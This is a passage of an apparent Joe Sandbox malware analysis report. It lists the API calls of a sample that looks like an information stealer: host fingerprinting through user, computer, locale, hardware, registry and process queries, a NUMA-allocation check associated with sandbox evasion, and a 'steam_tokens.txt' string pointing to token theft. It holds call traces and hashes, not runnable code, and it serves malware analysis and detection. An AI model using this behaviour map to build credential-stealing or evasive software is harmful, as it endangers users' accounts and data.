Source File: 00000000.00000002.2441563496.000000006C6D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6D0000, based on PE: true

Associated: 00000000.00000002.2441528205.000000006C6D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2441654899.000000006C75E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2441684437.000000006C762000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6d0000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: d27dc290aeecb51577f653887652b5331eba1a9a4fc4210fc9d72866eceee054
Instruction ID: cb03430bdc4091a478c7ce0de49e785a072e03b2e1765737686e649185b8b484
Opcode Fuzzy Hash: d27dc290aeecb51577f653887652b5331eba1a9a4fc4210fc9d72866eceee054
Instruction Fuzzy Hash: 98F0F962E2074896CA10EF3489811E6B3B0EF6B114F915339E84853591FF2072D88389

Function 00418F10 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00418F24
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00418F45
CloseHandle.KERNEL32(00000000), ref: 00418F4F

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 904f881645263b8d6980a0d5e63786ab633fa25ddeb60b9bffeff93c14b2dbd8
Instruction ID: 429e76ffcb292cc7325fe34a8c967f3e8a19cc1fb06d1469951f90a9fbb0bdee
Opcode Fuzzy Hash: 904f881645263b8d6980a0d5e63786ab633fa25ddeb60b9bffeff93c14b2dbd8
Instruction Fuzzy Hash: 29F05E74A0020CFBDB14DFA4DD4AFEE7779AB08700F004498BB0997290D6B0AE85CB94

Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004164BC), ref: 0040112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
ExitProcess.KERNEL32 ref: 00401143

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
Instruction ID: 0e2e6d3d2f445679f77a7861b9af8e0e8f55b174cdb9f0aa425208459b8dc1b3
Opcode Fuzzy Hash: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
Instruction Fuzzy Hash: 3DE08670945308FBE7205FA09C0AB4D76689B04B05F105056F708BA1E0C6B82501865C

Function 00411520 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00416FA0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00416FE2
Part of subcall function 00416FA0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041701F
Part of subcall function 00416FA0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004170A3
Part of subcall function 00416FA0: HeapAlloc.KERNEL32(00000000), ref: 004170AA

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 00417130: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417144
Part of subcall function 00417130: HeapAlloc.KERNEL32(00000000), ref: 0041714B

Part of subcall function 00417260: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0041D5B0,000000FF,?,004117A9,00000000,?,026D9740,00000000,?), ref: 00417292
Part of subcall function 00417260: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0041D5B0,000000FF,?,004117A9,00000000,?,026D9740,00000000,?), ref: 00417299

Part of subcall function 004172F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
Part of subcall function 004172F0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F

Part of subcall function 00417380: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
Part of subcall function 00417380: HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF

Part of subcall function 00417420: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DD0,00000000,?), ref: 00417450
Part of subcall function 00417420: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DD0,00000000,?), ref: 00417457
Part of subcall function 00417420: GetLocalTime.KERNEL32(?,?,?,?,?,00420DD0,00000000,?), ref: 00417464
Part of subcall function 00417420: wsprintfA.USER32 ref: 00417493

Part of subcall function 004174D0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,026D9568,00000000,?,00420DE0,00000000,?,00000000,00000000), ref: 00417503
Part of subcall function 004174D0: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,026D9568,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041750A
Part of subcall function 004174D0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,026D9568,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041751D

Part of subcall function 004175A0: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,026D9568,00000000,?,00420DE0,00000000,?,00000000,00000000), ref: 004175D5

Part of subcall function 00417630: GetKeyboardLayoutList.USER32(00000000,00000000,0042059F), ref: 00417681
Part of subcall function 00417630: LocalAlloc.KERNEL32(00000040,?), ref: 00417699
Part of subcall function 00417630: GetKeyboardLayoutList.USER32(?,00000000), ref: 004176AD
Part of subcall function 00417630: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417702
Part of subcall function 00417630: LocalFree.KERNEL32(00000000), ref: 004177C2

Part of subcall function 00417820: GetSystemPowerStatus.KERNEL32(?), ref: 0041784D

GetCurrentProcessId.KERNEL32(00000000,?,026D9800,00000000,?,00420DF4,00000000,?,00000000,00000000,?,026D9598,00000000,?,00420DF0,00000000), ref: 00411B8E

Part of subcall function 00418F10: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00418F24
Part of subcall function 00418F10: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00418F45
Part of subcall function 00418F10: CloseHandle.KERNEL32(00000000), ref: 00418F4F

Part of subcall function 004178A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178D7
Part of subcall function 004178A0: HeapAlloc.KERNEL32(00000000), ref: 004178DE
Part of subcall function 004178A0: RegOpenKeyExA.KERNEL32(80000002,026B9950,00000000,00020119,?), ref: 004178FE
Part of subcall function 004178A0: RegQueryValueExA.KERNEL32(?,026D99A0,00000000,00000000,000000FF,000000FF), ref: 0041791F
Part of subcall function 004178A0: RegCloseKey.ADVAPI32(?), ref: 00417932

Part of subcall function 00417A00: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00417A69
Part of subcall function 00417A00: GetLastError.KERNEL32 ref: 00417A78

Part of subcall function 00417970: GetSystemInfo.KERNEL32(00420DFC), ref: 004179A0
Part of subcall function 00417970: wsprintfA.USER32 ref: 004179B6

Part of subcall function 00417BA0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,026D9178,00000000,?,00420DFC,00000000,?,00000000), ref: 00417BD0
Part of subcall function 00417BA0: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,026D9178,00000000,?,00420DFC,00000000,?,00000000,00000000), ref: 00417BD7
Part of subcall function 00417BA0: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00417BF8
Part of subcall function 00417BA0: __aulldiv.LIBCMT ref: 00417C12
Part of subcall function 00417BA0: __aulldiv.LIBCMT ref: 00417C20
Part of subcall function 00417BA0: wsprintfA.USER32 ref: 00417C4C

Part of subcall function 00418260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DF8,00000000,?), ref: 004182CF
Part of subcall function 00418260: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DF8,00000000,?), ref: 004182D6
Part of subcall function 00418260: wsprintfA.USER32 ref: 004182F0

Part of subcall function 00417DC0: RegOpenKeyExA.KERNEL32(00000000,026BC788,00000000,00020019,00000000,004205A6), ref: 00417E44

Part of subcall function 00417DC0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00417EC6
Part of subcall function 00417DC0: wsprintfA.USER32 ref: 00417EF9
Part of subcall function 00417DC0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00417F1B
Part of subcall function 00417DC0: RegCloseKey.ADVAPI32(00000000), ref: 00417F2C
Part of subcall function 00417DC0: RegCloseKey.ADVAPI32(00000000), ref: 00417F39

Part of subcall function 00418120: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041816A
Part of subcall function 00418120: Process32First.KERNEL32(?,00000128), ref: 0041817E
Part of subcall function 00418120: Process32Next.KERNEL32(?,00000128), ref: 00418193
Part of subcall function 00418120: FindCloseChangeNotification.KERNEL32(?), ref: 00418201

lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041216B

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleLastLogicalMemoryModuleNextNotificationPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 869194160-0
Opcode ID: a1a8a6e18b644f11640906e78557ff41ba4da9ebd754e181159dd5d8ca3e8a87
Instruction ID: a9f6d0abc10a802bc737c54d14ff6b9d5e6ee0272f4c656d6212d3eaa4757419
Opcode Fuzzy Hash: a1a8a6e18b644f11640906e78557ff41ba4da9ebd754e181159dd5d8ca3e8a87
Instruction Fuzzy Hash: 8472A071851018AACB19FB91DC96EDEB33CAF24314F5042DFB51762051EF782B98CB6A

Function 00406C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 00406CEF

Strings

@, xrefs: 00406CC9

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 867edc3f7feb9bd756791c0b70ce9cc7864d6ccfd6d1b0176bf07496b986d28b
Instruction ID: a97aeec014860b7bcefe5a819602e0a11eb2ce5ea612e9d10357849f9a661301
Opcode Fuzzy Hash: 867edc3f7feb9bd756791c0b70ce9cc7864d6ccfd6d1b0176bf07496b986d28b
Instruction Fuzzy Hash: 3E213174A04208EFEB04CF89D544BAEBBB1FF48304F1181AAD456AB381D3799A91DF85

Function 00406D90 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8b28877c224b251f10175a9abca519b7fa48fc2f12a49a1c36a71eedd802e18
Instruction ID: 456806d1e879ecad470b616e27b80e03465aa0a519357bc85acbc9acecad2077
Opcode Fuzzy Hash: f8b28877c224b251f10175a9abca519b7fa48fc2f12a49a1c36a71eedd802e18
Instruction Fuzzy Hash: 116127B4900209DFCB14DF94E944BEEB7B0BB48304F1185AAE80677380D779AEA5DF95

Function 00414BE0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,026B6470,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

lstrlenA.KERNEL32(00000000,00000000,00420AB3,?,?,?,?,?,?,00415BEB,?), ref: 00414C0A

Strings

steam_tokens.txt, xrefs: 00414C1F

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 3e6e8c4ec68da8a60059a0c307bac8cddf5291aabd55d5ca038adbf108d907ef
Instruction ID: 43ba9c4e7b772c09295c3d1ddd3f4580462a4fb142283e9dc1187fbec7936fd0
Opcode Fuzzy Hash: 3e6e8c4ec68da8a60059a0c307bac8cddf5291aabd55d5ca038adbf108d907ef
Instruction Fuzzy Hash: 48F01271D1110876CB04F7B2EC579ED733CAE54358F90426EF41662092EF78665886AB

Function 00417970 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00420DFC), ref: 004179A0
wsprintfA.USER32 ref: 004179B6

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: b67a8d3803bdbcef095136fe51fb218f504635533fc880d72ddeb760f53951d8
Instruction ID: e5f7882cf5308591a3a92d8d4ad10ccbd8a019f3ce2acafa6204cd8ee8253483
Opcode Fuzzy Hash: b67a8d3803bdbcef095136fe51fb218f504635533fc880d72ddeb760f53951d8
Instruction Fuzzy Hash: 2DF0C2B1A00618EBCB10CF88ED45FAAB7BDFB08724F50066AF50492280D7785904CB94

Function 0040B370 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

lstrlenA.KERNEL32(00000000), ref: 0040B820
lstrlenA.KERNEL32(00000000), ref: 0040B834

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmpmemset
String ID:
API String ID: 4023347672-0
Opcode ID: d2f49430ee928d80acb91133ad1a5ceb7ea663d1af32cdc65678b0dbfe7b883d
Instruction ID: 12fecfe212cb7392b3f17e260ebd7fbbf5924c22592aec839546a7360daeb2af
Opcode Fuzzy Hash: d2f49430ee928d80acb91133ad1a5ceb7ea663d1af32cdc65678b0dbfe7b883d
Instruction Fuzzy Hash: 5DE12272911118ABCB14EBA1CC96EEE7339BF14314F40415EF507721A1EF786B98CB6A

Function 0040AD70 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

lstrlenA.KERNEL32(00000000), ref: 0040AFEA
lstrlenA.KERNEL32(00000000), ref: 0040AFFE

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
